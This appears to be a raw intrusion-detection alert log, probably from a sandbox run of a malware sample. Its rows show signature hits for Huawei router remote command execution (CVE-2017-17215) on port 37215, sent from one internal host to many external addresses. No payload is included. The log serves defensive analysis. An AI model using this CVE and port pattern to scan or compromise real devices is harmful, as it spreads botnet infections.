                                                    07/10/24-08:27:02.870791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5036037215192.168.2.14197.186.124.74
                                                    07/10/24-08:26:33.201787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386437215192.168.2.1441.123.48.54
                                                    07/10/24-08:26:38.563321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942837215192.168.2.1444.182.81.217
                                                    07/10/24-08:26:22.280856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4533237215192.168.2.1475.147.138.53
                                                    07/10/24-08:26:25.433410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5034037215192.168.2.14197.35.189.181
                                                    07/10/24-08:27:31.527963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4344837215192.168.2.1441.62.78.103
                                                    07/10/24-08:26:43.698482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937637215192.168.2.14173.104.63.173
                                                    07/10/24-08:26:43.778762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6010037215192.168.2.14157.102.115.247
                                                    07/10/24-08:27:19.256775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482637215192.168.2.1441.9.233.201
                                                    07/10/24-08:26:51.949287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908037215192.168.2.14157.160.106.128
                                                    07/10/24-08:27:05.154220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5929837215192.168.2.1441.210.135.201
                                                    07/10/24-08:27:20.474239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348237215192.168.2.14157.51.254.115
                                                    07/10/24-08:26:18.030544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064837215192.168.2.14157.226.41.117
                                                    07/10/24-08:27:20.396105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038637215192.168.2.14197.103.182.85
                                                    07/10/24-08:27:31.497518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812037215192.168.2.14161.194.49.20
                                                    07/10/24-08:26:42.399244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690637215192.168.2.14197.202.8.13
                                                    07/10/24-08:26:53.197285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5872837215192.168.2.1441.220.8.78
                                                    07/10/24-08:27:28.093525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387237215192.168.2.14197.220.13.52
                                                    07/10/24-08:26:42.425783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336237215192.168.2.1441.73.145.80
                                                    07/10/24-08:26:13.819139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277037215192.168.2.14197.163.81.243
                                                    07/10/24-08:27:23.953541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457237215192.168.2.14197.3.76.53
                                                    07/10/24-08:26:47.914277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604637215192.168.2.14197.99.245.70
                                                    07/10/24-08:27:05.128413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596837215192.168.2.14157.194.117.57
                                                    07/10/24-08:26:45.632406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147037215192.168.2.1441.78.105.52
                                                    07/10/24-08:27:08.383825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631237215192.168.2.1441.17.120.132
                                                    07/10/24-08:26:42.440990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485237215192.168.2.14191.212.106.96
                                                    07/10/24-08:26:23.333013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738437215192.168.2.14157.241.122.244
                                                    07/10/24-08:27:11.512071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377637215192.168.2.14157.184.211.243
                                                    07/10/24-08:26:11.595518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857037215192.168.2.1441.128.34.69
                                                    07/10/24-08:26:43.626199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953637215192.168.2.1499.226.241.110
                                                    07/10/24-08:26:34.224175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112437215192.168.2.14102.134.216.164
                                                    07/10/24-08:27:07.389277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944037215192.168.2.1441.145.118.155
                                                    07/10/24-08:26:52.021968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474237215192.168.2.14157.224.26.215
                                                    07/10/24-08:27:05.140242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5119037215192.168.2.14197.119.81.186
                                                    07/10/24-08:27:31.486586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417437215192.168.2.1420.127.132.83
                                                    07/10/24-08:26:55.390670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4576437215192.168.2.1441.219.241.250
                                                    07/10/24-08:26:45.619678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727237215192.168.2.1441.69.9.241
                                                    07/10/24-08:26:22.282645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4509237215192.168.2.1441.42.0.34
                                                    07/10/24-08:26:25.430533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479837215192.168.2.14157.145.220.135
                                                    07/10/24-08:26:18.019292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4871837215192.168.2.14157.184.179.153
                                                    07/10/24-08:26:18.020440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074637215192.168.2.14157.11.37.168
                                                    07/10/24-08:27:30.460852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825837215192.168.2.14191.126.46.112
                                                    07/10/24-08:26:31.090916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214437215192.168.2.14197.30.127.130
                                                    07/10/24-08:26:17.963816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776237215192.168.2.14157.78.25.150
                                                    07/10/24-08:26:57.655125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611037215192.168.2.14197.217.125.18
                                                    07/10/24-08:26:15.844473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5151837215192.168.2.1441.196.150.177
                                                    07/10/24-08:26:23.302644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5893037215192.168.2.1441.23.58.99
                                                    07/10/24-08:26:33.199657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801837215192.168.2.14103.197.216.129
                                                    07/10/24-08:26:57.665893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957437215192.168.2.1478.158.17.14
                                                    07/10/24-08:26:29.817859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697437215192.168.2.14197.90.225.59
                                                    07/10/24-08:26:45.656539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540837215192.168.2.1441.56.95.64
                                                    07/10/24-08:27:02.798764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891237215192.168.2.14207.241.41.67
                                                    07/10/24-08:26:25.469332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676637215192.168.2.1441.157.222.98
                                                    07/10/24-08:27:13.988914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414037215192.168.2.14112.26.29.246
                                                    07/10/24-08:26:14.816680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315237215192.168.2.14197.140.106.97
                                                    07/10/24-08:27:02.949585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689437215192.168.2.14164.235.59.149
                                                    07/10/24-08:27:13.866267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5049237215192.168.2.14157.43.62.221
                                                    07/10/24-08:27:33.976933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370237215192.168.2.1441.33.119.37
                                                    07/10/24-08:26:15.877145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656237215192.168.2.14172.143.43.102
                                                    07/10/24-08:26:33.189850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755037215192.168.2.14157.238.91.200
                                                    07/10/24-08:27:17.053274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748837215192.168.2.14138.188.112.88
                                                    07/10/24-08:27:10.589901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715037215192.168.2.14143.210.241.152
                                                    07/10/24-08:27:30.472890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972837215192.168.2.14197.27.183.71
                                                    07/10/24-08:26:28.837976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812037215192.168.2.14169.1.91.174
                                                    07/10/24-08:26:57.679549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318437215192.168.2.1441.20.117.14
                                                    07/10/24-08:26:33.254511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157637215192.168.2.14157.13.126.17
                                                    07/10/24-08:26:17.981356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957237215192.168.2.14122.171.235.219
                                                    07/10/24-08:27:22.468391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280437215192.168.2.14148.54.211.134
                                                    07/10/24-08:27:10.772266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356637215192.168.2.14157.12.76.231
                                                    07/10/24-08:27:27.029781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3993237215192.168.2.14197.60.90.236
                                                    07/10/24-08:26:11.571607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662637215192.168.2.14197.53.195.234
                                                    07/10/24-08:26:53.143446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442637215192.168.2.1441.204.234.42
                                                    07/10/24-08:26:59.834186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626437215192.168.2.14153.120.50.62
                                                    07/10/24-08:26:38.548975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790037215192.168.2.14197.171.57.64
                                                    07/10/24-08:26:43.870525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291837215192.168.2.14197.213.117.1
                                                    07/10/24-08:27:05.058899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4307237215192.168.2.14197.206.203.195
                                                    07/10/24-08:26:57.593723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351437215192.168.2.1441.160.109.81
                                                    07/10/24-08:26:45.603574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586237215192.168.2.1441.255.28.224
                                                    07/10/24-08:26:13.764508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565637215192.168.2.14197.162.249.93
                                                    07/10/24-08:26:17.947291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4366237215192.168.2.14197.217.195.195
                                                    07/10/24-08:26:47.901324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191437215192.168.2.1441.90.68.94
                                                    07/10/24-08:26:55.429801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118437215192.168.2.14197.129.194.172
                                                    07/10/24-08:27:07.388758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920437215192.168.2.1488.32.85.249
                                                    07/10/24-08:26:17.978087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5050637215192.168.2.1441.87.219.125
                                                    07/10/24-08:26:49.921267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889837215192.168.2.1441.167.206.167
                                                    07/10/24-08:26:17.928888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069437215192.168.2.1441.0.87.146
                                                    07/10/24-08:26:43.800437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377237215192.168.2.14197.182.251.142
                                                    07/10/24-08:27:05.155297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407237215192.168.2.1441.137.30.1
                                                    07/10/24-08:27:11.558298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317837215192.168.2.14197.242.129.43
                                                    07/10/24-08:27:13.821623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739037215192.168.2.14157.98.188.52
                                                    07/10/24-08:27:34.122449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924837215192.168.2.1441.119.43.111
                                                    07/10/24-08:26:48.005351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262437215192.168.2.1441.234.13.228
                                                    07/10/24-08:26:55.450781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498837215192.168.2.1441.247.112.62
                                                    07/10/24-08:27:11.537934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234237215192.168.2.1450.77.75.173
                                                    07/10/24-08:27:30.477635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092637215192.168.2.14197.221.164.224
                                                    07/10/24-08:26:42.432060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233637215192.168.2.14157.20.140.64
                                                    07/10/24-08:26:28.758809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5537037215192.168.2.144.115.197.84
                                                    07/10/24-08:27:20.439109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991837215192.168.2.14197.21.62.124
                                                    07/10/24-08:27:17.027039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039837215192.168.2.14197.157.255.185
                                                    07/10/24-08:27:31.463374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791237215192.168.2.14177.120.46.148
                                                    07/10/24-08:26:43.843292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088037215192.168.2.14162.49.181.60
                                                    07/10/24-08:26:11.446922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729837215192.168.2.14197.29.115.65
                                                    07/10/24-08:27:10.723777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335237215192.168.2.1441.188.159.27
                                                    07/10/24-08:26:29.785401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763437215192.168.2.1441.19.108.39
                                                    07/10/24-08:27:30.533467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947037215192.168.2.14197.29.135.251
                                                    07/10/24-08:26:42.459798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198837215192.168.2.1441.57.47.179
                                                    07/10/24-08:26:55.384906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038437215192.168.2.1495.23.202.91
                                                    07/10/24-08:27:19.211631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011637215192.168.2.1441.80.108.52
                                                    07/10/24-08:26:28.652584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652237215192.168.2.1441.224.24.2
                                                    07/10/24-08:26:55.437797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3345037215192.168.2.14122.50.126.19
                                                    07/10/24-08:26:59.801277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072637215192.168.2.14197.221.22.192
                                                    07/10/24-08:26:28.639081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505837215192.168.2.14157.13.202.202
                                                    07/10/24-08:26:47.910402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130237215192.168.2.14157.253.155.18
                                                    07/10/24-08:26:28.774897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032437215192.168.2.1491.166.199.8
                                                    07/10/24-08:26:20.130042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710637215192.168.2.14197.55.177.190
                                                    07/10/24-08:26:41.431055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544437215192.168.2.14157.171.63.198
                                                    07/10/24-08:27:28.156684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806237215192.168.2.1441.52.202.70
                                                    07/10/24-08:26:29.829287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569237215192.168.2.14157.98.71.161
                                                    07/10/24-08:27:07.384397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5609437215192.168.2.1441.135.113.149
                                                    07/10/24-08:27:22.532375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891037215192.168.2.14157.19.15.34
                                                    07/10/24-08:27:23.900911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295237215192.168.2.14207.90.242.89
                                                    07/10/24-08:27:22.909297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857237215192.168.2.1471.124.50.165
                                                    07/10/24-08:27:30.542155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260637215192.168.2.14157.231.223.195
                                                    07/10/24-08:27:31.571103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5665837215192.168.2.1434.81.205.142
                                                    07/10/24-08:27:11.474921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822437215192.168.2.1441.190.135.4
                                                    07/10/24-08:26:15.865935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357437215192.168.2.14157.209.3.135
                                                    07/10/24-08:26:41.446265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518637215192.168.2.14107.19.128.219
                                                    07/10/24-08:26:26.589872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061437215192.168.2.14197.55.231.25
                                                    07/10/24-08:26:11.566830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541437215192.168.2.1441.78.233.208
                                                    07/10/24-08:27:22.772225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3467837215192.168.2.1441.232.78.234
                                                    07/10/24-08:26:11.144714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443037215192.168.2.14157.227.252.63
                                                    07/10/24-08:26:31.088464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698637215192.168.2.14157.153.33.254
                                                    07/10/24-08:27:02.824725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357837215192.168.2.1441.168.79.48
                                                    07/10/24-08:26:43.731186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869037215192.168.2.14197.220.105.175
                                                    07/10/24-08:27:05.121354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873837215192.168.2.1441.143.18.126
                                                    07/10/24-08:27:02.845068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702037215192.168.2.14197.166.59.3
                                                    07/10/24-08:27:10.625884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566037215192.168.2.1441.67.216.33
                                                    07/10/24-08:27:20.428131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5992837215192.168.2.14100.159.211.192
                                                    07/10/24-08:27:23.953433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5247437215192.168.2.1441.166.178.163
                                                    07/10/24-08:27:02.939929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358837215192.168.2.14157.117.238.15
                                                    07/10/24-08:26:33.171488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493637215192.168.2.14197.224.132.60
                                                    07/10/24-08:27:08.402953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351837215192.168.2.14157.64.27.212
                                                    07/10/24-08:26:15.820169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818237215192.168.2.1485.206.210.165
                                                    07/10/24-08:26:53.168197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3712837215192.168.2.1441.13.73.81
                                                    07/10/24-08:26:22.296401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501437215192.168.2.14157.236.150.23
                                                    07/10/24-08:26:33.193965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235637215192.168.2.1441.100.81.89
                                                    07/10/24-08:27:19.267667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057837215192.168.2.1441.147.1.148
                                                    07/10/24-08:26:41.438343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158637215192.168.2.14197.135.205.188
                                                    07/10/24-08:26:25.469332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930637215192.168.2.14157.134.61.222
                                                    07/10/24-08:27:22.841630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814437215192.168.2.14197.252.126.202
                                                    07/10/24-08:26:43.718620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5263437215192.168.2.14197.138.19.0
                                                    07/10/24-08:26:25.469526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667237215192.168.2.14197.183.0.164
                                                    07/10/24-08:26:43.710286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504237215192.168.2.14125.74.32.151
                                                    07/10/24-08:26:55.343631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907637215192.168.2.1441.81.44.213
                                                    07/10/24-08:26:13.828221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835037215192.168.2.14157.57.24.152
                                                    07/10/24-08:26:20.155412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521037215192.168.2.1441.230.146.133
                                                    07/10/24-08:26:33.225770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113637215192.168.2.14157.175.138.217
                                                    07/10/24-08:26:36.348992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930837215192.168.2.14197.69.139.254
                                                    07/10/24-08:26:43.686036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3563837215192.168.2.14197.220.73.255
                                                    07/10/24-08:26:38.623017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929037215192.168.2.1441.133.49.98
                                                    07/10/24-08:27:24.938068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438837215192.168.2.14109.206.208.206
                                                    07/10/24-08:27:34.135035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298437215192.168.2.14197.42.51.33
                                                    07/10/24-08:26:11.122973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5224837215192.168.2.1441.80.154.10
                                                    07/10/24-08:26:55.410349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667037215192.168.2.1441.243.194.148
                                                    07/10/24-08:27:19.222748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5804237215192.168.2.1414.4.119.35
                                                    07/10/24-08:26:52.036040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726637215192.168.2.1441.192.49.229
                                                    07/10/24-08:26:20.080140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468237215192.168.2.1441.157.103.33
                                                    07/10/24-08:26:30.989816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3640237215192.168.2.14218.173.31.190
                                                    07/10/24-08:27:10.558614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652237215192.168.2.1499.10.133.86
                                                    07/10/24-08:26:43.856430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4337637215192.168.2.14157.110.169.47
                                                    07/10/24-08:27:23.873303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435037215192.168.2.1441.114.161.170
                                                    07/10/24-08:26:51.999483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080037215192.168.2.14197.38.180.131
                                                    07/10/24-08:26:13.646221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154237215192.168.2.14197.81.184.247
                                                    07/10/24-08:26:20.142588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894237215192.168.2.14157.70.89.1
                                                    07/10/24-08:26:20.164918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5861237215192.168.2.14157.206.59.65
                                                    07/10/24-08:26:47.886738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978037215192.168.2.1441.116.62.253
                                                    07/10/24-08:27:02.796781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5826637215192.168.2.14197.119.130.233
                                                    07/10/24-08:27:02.968527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510837215192.168.2.14197.69.64.70
                                                    07/10/24-08:26:43.657451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493437215192.168.2.14197.42.37.119
                                                    07/10/24-08:26:29.873958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4427037215192.168.2.1494.62.243.13
                                                    07/10/24-08:26:13.845798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471837215192.168.2.1441.197.135.27
                                                    07/10/24-08:26:53.150508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355837215192.168.2.14183.123.13.129
                                                    07/10/24-08:27:14.885760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280637215192.168.2.1441.178.173.48
                                                    07/10/24-08:26:34.214710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714437215192.168.2.14144.139.20.2
                                                    07/10/24-08:27:07.364210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700837215192.168.2.14197.14.235.208
                                                    07/10/24-08:26:59.632292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517837215192.168.2.14157.209.95.103
